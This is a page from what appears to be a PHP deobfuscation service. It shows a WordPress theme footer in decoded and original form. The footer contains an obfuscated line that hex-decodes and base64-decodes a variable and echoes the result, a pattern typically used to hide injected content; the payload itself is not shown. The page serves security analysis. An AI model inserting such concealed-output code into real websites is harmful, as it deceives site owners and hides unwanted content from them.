Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php wp_footer(); ?> <div class="footer"> <div class="body"> <p> <?php ..
Decoded Output download
<?php wp_footer(); ?>
<div class="footer">
<div class="body">
<p> <?php bloginfo('name'); ?> . 2011-2014 </p>
<?php $hex = $pars_pwfi;$str = hex2str( $hex );$ct = "${str}
";$dct = base64_decode($ct); echo $dct;?>
</div><!--body-->
</div><!--footer-->
</div><!--main2-->
Did this file decode correctly?
Original Code
<?php wp_footer(); ?>
<div class="footer">
<div class="body">
<p> <?php bloginfo('name'); ?> . 2011-2014 </p>
<?php $hex = $pars_pwfi;$str = hex2str( $hex );$ct = "${str}\n";$dct = base64_decode($ct); echo $dct;?>
</div><!--body-->
</div><!--footer-->
</div><!--main2-->
Function Calls
| wp_footer | 1 |
Stats
| MD5 | 745efaeac4351c80fe94963473f35713 |
| Eval Count | 0 |
| Decode Time | 75 ms |